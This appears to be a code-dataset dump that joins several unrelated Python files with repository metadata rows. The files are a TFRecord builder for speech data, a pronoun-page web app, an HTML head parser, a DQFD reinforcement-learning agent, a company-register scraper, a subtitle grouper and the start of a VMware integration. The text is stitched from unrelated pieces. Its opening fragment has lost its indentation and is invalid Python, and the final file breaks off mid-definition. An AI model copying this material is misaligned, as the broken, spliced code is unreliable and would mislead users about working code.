n_trn_data = [int(_val) for _val in conf.n_trn_data.replace(" ", "").split(',')]
n_test_data = [int(_val) for _val in conf.n_test_data.replace(" ", "").split(',')]
n_class = len(np.unique([LANGUAGE_LABELS[_dataset.split('_')[0]] for _dataset in dataset]))
valid_rate = conf.valid_rate
sampling_rate = conf.fs
window_size = conf.window_size
window_step = conf.window_step
augmentation = conf.data_aug
aug_type = conf.aug_type
aug_rate = conf.aug_rate
overwrite_tr_val = conf.overwrite
overwrite_test = conf.overwrite_test
overwrite_aug = conf.overwrite_aug
LOG_DIR = 'log/%s/%s' %(dataset_char, dataset_type)
tfrecord_info = os.path.join(dataset_char, 'min_%.1f_max_%.1f_winsize_%s_winstep_%s_ndata_%d'%(T_min, T_max, window_size, window_step, n_trn_data[0]))
if not conf.add_log == '':
tfrecord_info += '_%s' %conf.add_log
tfrecord_path = os.path.join(conf.data_dir, conf.tfr_dir_name, tfrecord_info)
if not os.path.exists(tfrecord_path):
os.makedirs(tfrecord_path)
tfrecord_path_trn = os.path.join(tfrecord_path, 'raw_mfcc_trn.tfrecords')
tfrecord_path_valid = os.path.join(tfrecord_path, 'raw_mfcc_val.tfrecords')
tfrecord_path_test = os.path.join(tfrecord_path, 'raw_mfcc_test.tfrecords')
tfrecord_path_aug = os.path.join(tfrecord_path, 'raw_mfcc_trn_aug_%s_%s.tfrecords'%(aug_type, aug_rate))
meta_dir_test = [os.path.join(conf.data_dir, 'meta', '%s.txt' %(_data)) for _data in dataset_test]
tfrecord_path_info = os.path.join(tfrecord_path, 'dataset_info.pkl')
orig_stdout = sys.stdout
date = datetime.datetime.now().strftime('%Y%m%d_%H:%M')
txt_stdout = open(tfrecord_path + '/history_%s.txt'%date, 'wt')
_stdouts = [orig_stdout, txt_stdout]
mprint = multi_print(_stdouts, orig_stdout)
config_keys = [key for key in conf]
config_keys.sort()
for key in config_keys:
mprint('%s: %s' %(key, conf[key].value))
record = MakeTFRecord(sampling_rate, window_size, window_step, T_min, T_max, n_features,
data_dir, meta_dir, n_trn_data, valid_rate,
data_dir, meta_dir_test, n_test_data,
tfrecord_path, tfrecord_path_trn, tfrecord_path_valid, tfrecord_path_test, tfrecord_path_info,
overwrite_tr_val, overwrite_test,
mprint)
if not os.path.exists(tfrecord_path_info) or not os.path.exists(tfrecord_path_trn) or not os.path.exists(tfrecord_path_valid) or overwrite_tr_val:
record.make_trn_val_tfrecord()
DATA_INFO = dict()
for key in conf:
DATA_INFO[key] = conf[key].value if not key in ['dataset', 'dataset_test'] else conf[key].value.replace(" ", "").split(',')
DATA_INFO['LANGUAGE_LABELS'] = LANGUAGE_LABELS
DATA_INFO['LOG_DIR'] = LOG_DIR
DATA_INFO['n_class'] = n_class
DATA_INFO['n_trn'] = record.n_trn
DATA_INFO['n_valid'] = record.n_valid
DATA_INFO['label_in_dataset'] = np.unique(record.label_in_dataset)
DATA_INFO['trn_data_shape'] = record.trn_data_shape
DATA_INFO['valid_data_shape'] = record.valid_data_shape
DATA_INFO['trn_mean'] = record.trn_mean
DATA_INFO['trn_std'] = record.trn_std
DATA_INFO['tfrecord_path_trn'] = tfrecord_path_trn
DATA_INFO['tfrecord_path_valid'] = tfrecord_path_valid
with open(tfrecord_path_info, 'wb') as f:
pickle.dump(DATA_INFO, f)
else:
mprint('Do not make the tfrecord files for train/valid')
if not os.path.exists(tfrecord_path_test) or overwrite_test:
if not record.make_trn_val_data:
with open(tfrecord_path_info, 'rb') as f:
DATA_INFO = pickle.load(f)
record.label_in_dataset = DATA_INFO['label_in_dataset']
record.make_test_tfrecord()
DATA_INFO['n_test'] = record.n_test
DATA_INFO['tfrecord_path_test'] = tfrecord_path_test
DATA_INFO['dataset_test'] = conf['dataset_test'].value.replace(" ", "").split(',')
with open(tfrecord_path_info, 'wb') as f:
pickle.dump(DATA_INFO, f)
else:
mprint('Do not make the tfrecord files for test')
if augmentation:
if not os.path.exists(tfrecord_path_aug) or overwrite_aug:
record.make_augment_tfrecord(tfrecord_path_aug, aug_type=aug_type, aug_rate=aug_rate, overwrite_aug=overwrite_aug)
with open(tfrecord_path_info, 'rb') as f:
DATA_INFO = pickle.load(f)
_backup_name = 'dataset_info_backup_before_%s_%s.pkl'%(aug_type, aug_rate)
os.rename(tfrecord_path_info, os.path.join(tfrecord_path, _backup_name))
DATA_INFO['n_aug_%s_%s'%(aug_type, aug_rate)] = record.n_aug
DATA_INFO['tfrecord_path_trn_aug_%s_%s'%(aug_type, aug_rate)] = tfrecord_path_aug
DATA_INFO['trn_aug_%s_%s_mean'%(aug_type, aug_rate)] = record.trn_aug_mean
DATA_INFO['trn_aug_%s_%s_std'%(aug_type, aug_rate)] = record.trn_aug_std
DATA_INFO['trn_aug_data_shape_%s_%s'%(aug_type, aug_rate)] = record.trn_aug_data_shape
with open(tfrecord_path_info, 'wb') as f:
pickle.dump(DATA_INFO, f)
else:
mprint('Do not make the tfrecord files for augmentation')
mprint('Make TFRecord is finished.')
else:
raise ImportError('Wrong access. This script is for only making tfrecord.')
| 35.356886 | 198 | 0.644481 |
4d06499f67927b33b3dce5134bef5307a00b5961
| 2,725 |
py
|
Python
|
main.py
|
ACBob/pronouns
|
1b5d4c171448c0f5ea55bd6d507b06b897178fc5
|
[
"WTFPL",
"MIT"
] | 2 |
2021-09-06T19:22:27.000Z
|
2021-11-14T20:02:59.000Z
|
main.py
|
ACBob/pronouns
|
1b5d4c171448c0f5ea55bd6d507b06b897178fc5
|
[
"WTFPL",
"MIT"
] | null | null | null |
main.py
|
ACBob/pronouns
|
1b5d4c171448c0f5ea55bd6d507b06b897178fc5
|
[
"WTFPL",
"MIT"
] | null | null | null |
# mypronoun.is clone, that lets you define custom terms
# Because a closed-off request database isn't very helpful for self-expression
import web
from web.contrib.template import render_jinja
from scss import compiler
urls = (
'/(.*)\.css', 'stylesheet', # Preprocesses the stylesheet with sass
'/(.*)\.svg', 'svg', # returns the svg
'/(.*)', 'pronoun'
)
app = web.application(urls, globals())
builtin_pronouns = [
["he", "him", "his"],
["she", "her", "her"],
["they", "them", "their"],
# Commonly used neopronouns, from a list that claimed 'he' was a neopronoun
["e", "em", "eir"],
["per", "per", "pers"],
["ve", "ver", "vis"],
["ze", "hir", "hir"],
["zie", "hir", "hir"]
]
render_page = render_jinja('pages', encoding='utf-8')
def test_pronouns(nouns):
a = nouns[0]
for n in builtin_pronouns:
if a == n[0]:
if len(nouns) > 1:
if not nouns[1] == n[1]:
continue
return [[pronoun.capitalize() for pronoun in n]]
return None
class pronoun:
def GET(self, args):
pronouns = args.split('/')
if pronouns == ['']:
# TODO: HOMEPAGE
return render_page.index()
elif '&&' in args:
a = [] # The new list
b = [] # Current List working on
for p in pronouns:
g = test_pronouns([p])
if not g is None:
a.append(g[0])
b = []
continue
if p == "&&":
if len(b) > 0:
a.append(b)
b = []
continue
b.append(p)
if len(b) > 0:
a.append(b)
print(a)
return render_page.pronouns(pronouns=a)
elif len(pronouns) == 1:
# Try a built-in pronoun
a = test_pronouns(pronouns)
if not a is None:
return render_page.pronouns(pronouns=a)
return render_page.error(error="We don't seem to know that one! Try specifying them all, in a nominative/possesive/oblique format.")
elif len(pronouns) == 2:
# Try a built-in again
a = test_pronouns(pronouns)
if not a is None:
return render_page.pronouns(pronouns=a)
# Two is enough to construct SOME pronouns
pronouns = [n.capitalize() for n in pronouns]
return render_page.pronouns(pronouns=[pronouns])
elif len(pronouns) == 3:
pronouns = [n.capitalize() for n in pronouns]
return render_page.pronouns(pronouns=[pronouns])
elif not "&&" in pronouns:
return render_page.error(error="You have specified too many pronouns! Try 3, in a nominative/possesive/oblique format.<br>If you wish to have another set, seperate it with &&.")
class stylesheet: # TODO: is it inefficient to serve it every time? Maybe compile the scss when ran and serve that!
def GET(self, args):
return compiler.compile_file(args+".scss")
class svg:
def GET(self, args):
return open(args+".svg").read()
if __name__ == "__main__":
app.run()
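# --- Example requests (added sketch, not part of the original routes) ---
# GET /they                  -> matches the built-in they/them/their set
# GET /xe/xem/xyr            -> renders the three custom forms as given
# GET /xe/xem/xyr/&&/they    -> renders two pronoun sets: the custom one and the built-in 'they' set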
| 25.707547 | 181 | 0.640367 |
4d3391e6671e9315173e5de530b420b07417d6bc
| 4,178 |
py
|
Python
|
checks/html_head.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 19 |
2018-04-20T11:03:41.000Z
|
2022-01-12T20:58:56.000Z
|
checks/html_head.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 160 |
2018-04-05T16:12:59.000Z
|
2022-03-01T13:01:27.000Z
|
checks/html_head.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 8 |
2018-11-05T13:07:57.000Z
|
2021-06-11T11:46:43.000Z
|
"""
Extracts information from the html <head>, like existence and value
of certain meta tags, link tags, title, etc.
"""
import logging
import re
from urllib.parse import urljoin
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from checks.abstract_checker import AbstractChecker
class Checker(AbstractChecker):
def __init__(self, config, previous_results=None):
super().__init__(config, previous_results)
def run(self):
results = {}
for url in self.config.urls:
results[url] = self.get_content(url)
return results
def get_content(self, url):
"""
Expects page_content_dict['content'] to carry the HTML content
"""
page_content = self.previous_results['page_content'][url]
assert 'content' in page_content
assert 'response_headers' in page_content
assert 'content-type' in page_content['response_headers']
if page_content['content'] is None:
return
soup = BeautifulSoup(page_content['content'], 'html.parser')
head = soup.find('head')
result = {
'title': self.get_title(head),
'link_canonical': self.get_link_canonical(head, url),
'link_rss_atom': self.get_link_rss_atom(head, url),
'link_icon': self.get_link_icon(head, url),
'generator': self.get_generator(head),
'opengraph': self.get_opengraph(head),
'viewport': self.get_viewport(head),
}
return result
def get_title(self, head):
"""Extract and clean up page title"""
if head is None:
return
title = None
tag = head.find('title')
if tag is None:
return
title = tag.get_text()
# clean up
title = title.replace(u'\u00a0', ' ')
title = title.replace(' ', ' ')
title = title.strip()
return title
def get_link_canonical(self, head, url):
if head is None:
return
link = head.find('link', rel='canonical')
if link:
return urljoin(url, link.get('href'))
def get_link_rss_atom(self, head, url):
if head is None:
return
hrefs = []
rss_links = head.find_all('link', type='application/rss+xml')
atom_links = head.find_all('link', type='application/atom+xml')
if rss_links:
for link in rss_links:
hrefs.append(link.get('href'))
if atom_links:
            for link in atom_links:
hrefs.append(link.get('href'))
# make URLs absolute
for i in range(len(hrefs)):
parsed = urlparse(hrefs[i])
if parsed.scheme == '':
hrefs[i] = urljoin(url, hrefs[i])
return hrefs
def get_link_icon(self, head, url):
if head is None:
return
tag = head.find('link', rel=lambda x: x and x.lower() == 'icon')
if tag:
return urljoin(url, tag.get('href'))
tag = head.find('link', rel=lambda x: x and x.lower() == 'shortcut icon')
if tag:
return urljoin(url, tag.get('href'))
def get_generator(self, head):
if head is None:
return
tags = head.select('[name=generator]')
if tags:
return tags[0].get('content')
def get_opengraph(self, head):
if head is None:
return
# we find tags by matching this property/itemprop value regex
property_re = re.compile('^og:')
opengraph = set()
for tag in head.find_all(property=property_re):
opengraph.add(tag.get('property'))
for tag in head.find_all(itemprop=property_re):
opengraph.add(tag.get('itemprop'))
opengraph = sorted(list(opengraph))
if opengraph != []:
return opengraph
def get_viewport(self, head):
if head is None:
return
tags = head.select('[name=viewport]')
if tags:
return tags[0].get('content')
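# --- Usage sketch (added; illustrative only) ---
# The shape of `config` and of the 'page_content' entry below is inferred from how
# run()/get_content() read them; the real green-spider config object may differ, and
# AbstractChecker is assumed to simply store `config` and `previous_results` as attributes.
if __name__ == '__main__':
    from types import SimpleNamespace

    url = 'https://example.org/'
    fake_previous_results = {
        'page_content': {
            url: {
                'content': ('<html><head><title> Example page </title>'
                            '<link rel="canonical" href="/start"></head><body></body></html>'),
                'response_headers': {'content-type': 'text/html'},
            }
        }
    }
    checker = Checker(config=SimpleNamespace(urls=[url]),
                      previous_results=fake_previous_results)
    print(checker.run())
    # -> title 'Example page', canonical 'https://example.org/start', empty feed list, etc.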
| 27.30719 | 81 | 0.561034 |
150b1f4b3826c879ab58eb71c304de9f4aaca2b7
| 10,516 |
py
|
Python
|
tensorforce/agents/dqfd_agent.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | null | null | null |
tensorforce/agents/dqfd_agent.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | null | null | null |
tensorforce/agents/dqfd_agent.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | 1 |
2019-11-29T12:28:33.000Z
|
2019-11-29T12:28:33.000Z
|
# Copyright 2017 reinforce.io. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from six.moves import xrange
from tensorforce.agents import LearningAgent
from tensorforce.models import QDemoModel
class DQFDAgent(LearningAgent):
"""
Deep Q-learning from demonstration agent
([Hester et al., 2017](https://arxiv.org/abs/1704.03732)).
"""
def __init__(
self,
states,
actions,
network,
batched_observe=True,
batching_capacity=1000,
scope='dqfd',
device=None,
saver=None,
summarizer=None,
execution=None,
variable_noise=None,
states_preprocessing=None,
actions_exploration=None,
reward_preprocessing=None,
update_mode=None,
memory=None,
optimizer=None,
discount=0.99,
distributions=None,
entropy_regularization=None,
target_sync_frequency=10000,
target_update_weight=1.0,
huber_loss=None,
# first_update=10000,
# repeat_update=1
expert_margin=0.5,
supervised_weight=0.1,
demo_memory_capacity=10000,
demo_sampling_ratio=0.2
):
"""
Initializes the DQFD agent.
Args:
update_mode (spec): Update mode specification, with the following attributes:
- unit: 'timesteps' if given (default: 'timesteps').
- batch_size: integer (default: 32).
- frequency: integer (default: 4).
memory (spec): Memory specification, see core.memories module for more information
(default: {type='replay', include_next_states=true, capacity=1000*batch_size}).
optimizer (spec): Optimizer specification, see core.optimizers module for more
information (default: {type='adam', learning_rate=1e-3}).
target_sync_frequency (int): Target network sync frequency (default: 10000).
target_update_weight (float): Target network update weight (default: 1.0).
huber_loss (float): Huber loss clipping (default: none).
expert_margin (float): Enforced supervised margin between expert action Q-value and
other Q-values (default: 0.5).
supervised_weight (float): Weight of supervised loss term (default: 0.1).
demo_memory_capacity (int): Capacity of expert demonstration memory (default: 10000).
demo_sampling_ratio (float): Runtime sampling ratio of expert data (default: 0.2).
"""
# Update mode
if update_mode is None:
update_mode = dict(
unit='timesteps',
batch_size=32,
frequency=4
)
elif 'unit' in update_mode:
assert update_mode['unit'] == 'timesteps'
else:
update_mode['unit'] = 'timesteps'
# Memory
if memory is None:
# Default capacity of 1000 batches
memory = dict(
type='replay',
include_next_states=True,
capacity=(1000 * update_mode['batch_size'])
)
else:
assert memory['include_next_states']
# Optimizer
if optimizer is None:
optimizer = dict(
type='adam',
learning_rate=1e-3
)
self.target_sync_frequency = target_sync_frequency
self.target_update_weight = target_update_weight
self.double_q_model = True
self.huber_loss = huber_loss
self.expert_margin = expert_margin
self.supervised_weight = supervised_weight
self.demo_memory_capacity = demo_memory_capacity
# The demo_sampling_ratio, called p in paper, controls ratio of expert vs online training samples
# p = n_demo / (n_demo + n_replay) => n_demo = p * n_replay / (1 - p)
self.demo_batch_size = int(demo_sampling_ratio * update_mode['batch_size'] / (1.0 - demo_sampling_ratio))
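        # e.g. with the default batch_size=32 and demo_sampling_ratio=0.2:
        # demo_batch_size = int(0.2 * 32 / 0.8) = 8 demonstration samples per update.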
assert self.demo_batch_size > 0, 'Check DQFD sampling parameters to ensure ' \
'demo_batch_size is positive. (Calculated {} based on current' \
' parameters)'.format(self.demo_batch_size)
# This is the demonstration memory that we will fill with observations before starting
# the main training loop
super(DQFDAgent, self).__init__(
states=states,
actions=actions,
batched_observe=batched_observe,
batching_capacity=batching_capacity,
scope=scope,
device=device,
saver=saver,
summarizer=summarizer,
execution=execution,
variable_noise=variable_noise,
states_preprocessing=states_preprocessing,
actions_exploration=actions_exploration,
reward_preprocessing=reward_preprocessing,
update_mode=update_mode,
memory=memory,
optimizer=optimizer,
discount=discount,
network=network,
distributions=distributions,
entropy_regularization=entropy_regularization
)
def initialize_model(self):
return QDemoModel(
states=self.states,
actions=self.actions,
scope=self.scope,
device=self.device,
saver=self.saver,
summarizer=self.summarizer,
execution=self.distributed,
batching_capacity=self.batching_capacity,
variable_noise=self.variable_noise,
states_preprocessing=self.states_preprocessing,
actions_exploration=self.actions_exploration,
reward_preprocessing=self.reward_preprocessing,
update_mode=self.update_mode,
memory=self.memory,
optimizer=self.optimizer,
discount=self.discount,
network=self.network,
distributions=self.distributions,
entropy_regularization=self.entropy_regularization,
target_sync_frequency=self.target_sync_frequency,
target_update_weight=self.target_update_weight,
# DQFD always uses double dqn, which is a required key for a q-model.
double_q_model=True,
huber_loss=self.huber_loss,
expert_margin=self.expert_margin,
supervised_weight=self.supervised_weight,
demo_memory_capacity=self.demo_memory_capacity,
demo_batch_size=self.demo_batch_size
)
# This is handled by the model now
# def observe(self, reward, terminal):
# """
# Adds observations, updates via sampling from memories according to update rate.
# DQFD samples from the online replay memory and the demo memory with
# the fractions controlled by a hyper parameter p called 'expert sampling ratio.
#
# Args:
# reward:
# terminal:
# """
# super(DQFDAgent, self).observe(reward=reward, terminal=terminal)
# if self.timestep >= self.first_update and self.timestep % self.update_frequency == 0:
# for _ in xrange(self.repeat_update):
# self.model.demonstration_update()
def import_demonstrations(self, demonstrations):
"""
Imports demonstrations, i.e. expert observations. Note that for large numbers of observations,
        set_demonstrations is more appropriate, which directly sets memory contents to an array and expects
a different layout.
Args:
demonstrations: List of observation dicts
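                A rough illustration of the expected layout (keys as read by the loop below):
                [{'states': ..., 'internals': {...}, 'actions': ..., 'terminal': False, 'reward': 0.0}, ...]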
"""
if isinstance(demonstrations, dict):
if self.unique_state:
demonstrations['states'] = dict(state=demonstrations['states'])
if self.unique_action:
demonstrations['actions'] = dict(action=demonstrations['actions'])
self.model.import_demo_experience(**demonstrations)
else:
if self.unique_state:
states = dict(state=list())
else:
states = {name: list() for name in demonstrations[0]['states']}
internals = {name: list() for name in demonstrations[0]['internals']}
if self.unique_action:
actions = dict(action=list())
else:
actions = {name: list() for name in demonstrations[0]['actions']}
terminal = list()
reward = list()
for demonstration in demonstrations:
if self.unique_state:
states['state'].append(demonstration['states'])
else:
for name, state in states.items():
state.append(demonstration['states'][name])
for name, internal in internals.items():
internal.append(demonstration['internals'][name])
if self.unique_action:
actions['action'].append(demonstration['actions'])
else:
for name, action in actions.items():
action.append(demonstration['actions'][name])
terminal.append(demonstration['terminal'])
reward.append(demonstration['reward'])
self.model.import_demo_experience(
states=states,
internals=internals,
actions=actions,
terminal=terminal,
reward=reward
)
def pretrain(self, steps):
"""
Computes pre-train updates.
Args:
steps: Number of updates to execute.
"""
for _ in xrange(steps):
self.model.demo_update()
| 39.385768 | 113 | 0.600323 |
429406f4f27b81748c79467b7d59db0cc518a219
| 100 |
py
|
Python
|
ggit_platform/apps.py
|
girlsgoit/GirlsGoIT
|
447cd15c44ebee4af9e942a079d681be8683239f
|
[
"MIT"
] | 1 |
2019-02-27T21:20:54.000Z
|
2019-02-27T21:20:54.000Z
|
ggit_platform/apps.py
|
girlsgoit/GirlsGoIT
|
447cd15c44ebee4af9e942a079d681be8683239f
|
[
"MIT"
] | null | null | null |
ggit_platform/apps.py
|
girlsgoit/GirlsGoIT
|
447cd15c44ebee4af9e942a079d681be8683239f
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class GgitPlatformConfig(AppConfig):
name = 'ggit_platform'
| 16.666667 | 36 | 0.78 |
c009520bc5df6124e77038a16f913e637f6ad1b7
| 2,707 |
py
|
Python
|
scrape.py
|
digitalegarage/commerzbank-scraper
|
818c759ed0f62cf35aaebc38ad769ffb415c2cd5
|
[
"MIT"
] | null | null | null |
scrape.py
|
digitalegarage/commerzbank-scraper
|
818c759ed0f62cf35aaebc38ad769ffb415c2cd5
|
[
"MIT"
] | null | null | null |
scrape.py
|
digitalegarage/commerzbank-scraper
|
818c759ed0f62cf35aaebc38ad769ffb415c2cd5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from mechanize import Browser
from bs4 import BeautifulSoup as BS
from datetime import datetime
import re
import os
import csv
import config
###############
### SCRAPER ###
###############
def get_documents (s = config.suchbegriff, b = config.bereich, l = config.language, sd = config.start_day, sm = config.start_month, sy = config.start_year, ed = config.end_day, em = config.end_month, ey = config.end_year):
    # Initialize the browser
br = Browser()
br.set_handle_robots(False)
br.set_handle_referer(False)
br.set_handle_refresh(False)
br.addheaders = [('User-agent', 'Firefox')]
br.open('https://www.unternehmensregister.de/ureg/search1.6.html')
    # Fill out the page's search form with the options passed in above
br.select_form(name="searchRegisterForm")
br['searchRegisterForm:registerDataFullText'] = s
br['searchRegisterForm:publicationsOfCapitalInvestmentsCategory'] = [b,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsLanguage'] = [l,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsStartDateDay'] = [sd,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsStartDateMonth'] = [sm,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsStartDateYear'] = [sy,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsEndDateDay'] = [ed,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsEndDateMonth'] = [em,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsEndDateYear'] = [ey,]
br.submit()
    # Save the documents into the "Sites" folder
destination = "Sites/"
base_url = br.geturl()
soup = BS(br.response().read(), "html.parser")
    # nDocs counts the documents
nDocs = 1
page_next = ""
    # Click the "Weiter" (next) button at the end of the page, if it exists
while page_next is not None:
        # look for the "Weiter" (next) button
try:
page_next = soup.find('div', attrs={'id': 'result_pagingnav'}).find(string="Weiter").parent.get('href')
except AttributeError:
page_next = None
        # links to the documents carry the title 'Mitteilung bedeutender Stimmrechtsanteile'
doc_links = soup.find_all('a', attrs={'title': 'Mitteilung bedeutender Stimmrechtsanteile'})
for doc in doc_links:
br.open(base_url + doc.get('href'))
soup = BS(br.response().read().decode('utf-8'), "html.parser")
f = open(destination + "/" + re.search("id=([0-9]*)", doc.get('href')).group(0).replace("=","_") + ".html", 'w')
f.write(str(soup))
f.close()
print nDocs
print base_url + doc.get('href')
nDocs = nDocs + 1
if page_next is not None:
br.open(base_url + page_next)
soup = BS(br.response().read(), "html.parser")
get_documents()
| 29.107527 | 223 | 0.72331 |
3f26cba2b70b69db1956b9a560ae419b2b208567
| 637 |
py
|
Python
|
examples/message_received_poll_example.py
|
Hofei90/telegram_api
|
8e910e15d7147db4b3828fa6fd1cfe2f5d33c077
|
[
"MIT"
] | null | null | null |
examples/message_received_poll_example.py
|
Hofei90/telegram_api
|
8e910e15d7147db4b3828fa6fd1cfe2f5d33c077
|
[
"MIT"
] | 4 |
2019-04-24T12:56:34.000Z
|
2020-06-25T20:16:56.000Z
|
examples/message_received_poll_example.py
|
Hofei90/telegram_api
|
8e910e15d7147db4b3828fa6fd1cfe2f5d33c077
|
[
"MIT"
] | null | null | null |
import os
import toml
import telegram_bot_api as api
def config_laden():
configfile = os.path.join(SKRIPTPFAD, "example_cfg.toml")
with open(configfile) as file:
return toml.loads(file.read())
SKRIPTPFAD = os.path.abspath(os.path.dirname(__file__))
CONFIG = config_laden()
def main():
bot = api.Bot(CONFIG["telegram"]["token"])
while True:
messages = bot.get_updates()
for message in messages:
print("Gesamte Rückgabe mit sämlichen Informationen:")
print(message)
print(f"Nur Text: {message['message']['text']}")
if __name__ == "__main__":
main()
| 21.233333 | 66 | 0.643642 |
58ad08132952b852962f0a0d52edc84c273d70ab
| 3,993 |
py
|
Python
|
group_sentences.py
|
NickForero11/Subbler
|
ed528514e96ddc30d58230ff98ff0fd5216ea5de
|
[
"MIT"
] | null | null | null |
group_sentences.py
|
NickForero11/Subbler
|
ed528514e96ddc30d58230ff98ff0fd5216ea5de
|
[
"MIT"
] | null | null | null |
group_sentences.py
|
NickForero11/Subbler
|
ed528514e96ddc30d58230ff98ff0fd5216ea5de
|
[
"MIT"
] | null | null | null |
"""Module to handle the creation of subtitles based on AWS Transcribe
processed data.
"""
from sys import exit
def chunk_array(array, size):
"""Create a list of sublists of a specific size based on another list.
    Please take into account that if the size is not an exact divisor of the
    original list length, the last sublist of the list will have fewer elements
    than expected.
Examples:
Inexact:
array: [1,2,3,4,5]
size: 2
result: [ [1,2], [3,4], [5] ]
Exact:
array: [1,2,3,4]
size: 2
result: [ [1,2], [3,4] ]
Arguments:
array (list): the array that will be divided in subarrays of len: size
        size (int): the size of every subarray in the response list (taking
            into account the exactness).
Returns:
list: a list of sublists of length equal to size based on array.
"""
result = []
for i in range(0, len(array), size):
chunk = array[i:i + size]
result.append(chunk)
return result
def get_group_sentences(data):
"""Creates a list of subtitles with 2 lines of 5 words and its timestamps.
Arguments:
data (dict): a dict (from a JSON data) with transcription data
following the AWS Transcribe format:
{
data:[
{
"start_time": "106.11",
"end_time": "106.64",
"alternatives": [
{
"confidence": "1.0",
"content": "hi"
}
],
"type": "pronunciation"
}, ...
]
}
Returns:
list: a list of subtitles following this format:
[
{
'init_mark': 106.11,
'end_mark': 156.67,
'text': [
'there are subtitle lines of',
'only five words per line'
]
}, ...
]
"""
if not data:
print("There isn't any transcription data")
exit(1)
try:
# Create a list of sublists with a length of ten words
stamps = chunk_array(data['data'], 10)
subtitles = []
for line in stamps:
if len(line) > 1:
# Don't start a line with punctuation symbols.
if line[0]['type'] != 'punctuation':
first_word = line[0]
else:
first_word = line[1]
# Don't end a line with punctuation symbols.
if line[-1]['type'] != 'punctuation':
last_word = line[-1]
else:
last_word = line[-2]
# Set timemarks
init_mark = first_word['start_time']
end_mark = last_word['end_time']
# Create a list of words
words = []
for text in line:
word = text['alternatives'][0]['content']
words.append(word)
# Create two lines of five words
paragraph = chunk_array(words, 5)
pre_sentences = [' '.join(line) for line in paragraph]
# Adjust punctuation symbols.
sentences = [
line.replace(' .', '.').replace(' ,', ',')
for line in pre_sentences
]
# Add subtitle to the response list
subtitles.append(
{
'init_mark': init_mark,
'end_mark': end_mark,
'text': sentences
}
)
return subtitles
except KeyError:
print("The transcripted data isn't in the correct format")
exit(1)
| 30.953488 | 79 | 0.454295 |
45219ec6399dff04b10b1dd7070b81ecf6216806
| 22,271 |
py
|
Python
|
Packs/VMwareWorkspaceONEUEM/Integrations/VMwareWorkspaceONEUEM/VMwareWorkspaceONEUEM.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/VMwareWorkspaceONEUEM/Integrations/VMwareWorkspaceONEUEM/VMwareWorkspaceONEUEM.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/VMwareWorkspaceONEUEM/Integrations/VMwareWorkspaceONEUEM/VMwareWorkspaceONEUEM.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
from CommonServerUserPython import * # noqa
import requests
import traceback
from typing import Dict, Tuple, List, Any, Optional
# Disable insecure warnings
# requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' # ISO8601 format with UTC, default in XSOAR
READABLE_DATE_FORMAT = '%B %d, %Y at %I:%M:%S %p'
API_VERSION = 2
LOGGING_INTEGRATION_NAME = "[VMware Workspace ONE UEM (AirWatch MDM)]"
HTTP_ERROR = {
401: "An error occurred while validating the credentials, please check the username or password.",
403: "Invalid API key or the user doesn't have sufficient permissions to perform this operation.",
404: "The resource cannot be found.",
407: "Proxy Error - cannot connect to proxy. Either try clearing the 'Use system proxy' check-box or"
"check the host, authentication details and connection details for the proxy.",
500: "The server encountered an internal error for VMWare Workspace ONE UEM "
"and was unable to complete your request."
}
ARG_TO_PARAM_OWNERSHIP = {
"corporate owned": "C",
"employee owned": "E",
"shared": "S",
"undefined": "undefined"
}
REVERSED_ARG_TO_PARAM_OWNERSHIP = {
'C': 'Corporate owned',
'E': 'Employee owned',
'S': 'Shared',
'Undefined': 'Undefined'
}
MESSAGES = {
"NO_RECORDS_FOUND": "No {} record(s) found for the given argument(s).",
"INVALID_PAGE_SIZE": "Argument page_size should be greater than 1.",
"INVALID_PAGE": "Argument page should be greater than 0.",
"INVALID_OWNERSHIP": "Argument ownership should be one of the following: "
"Corporate owned, Employee owned, Shared, or Undefined.",
"INVALID_SORT_ORDER": "Argument sort_order should be one of the following: ASC, or DESC.",
"REQUIRED_ARGUMENT": "{} is a required argument.",
"INVALID_COMPLIANCE_STATUS": "Argument compliance_status should be one of the following: true, or false."
}
CONSTANT_STRING = {
"DEVICE_FRIENDLY": "Device Friendly Name",
"SERIAL_NUM": "Serial Number",
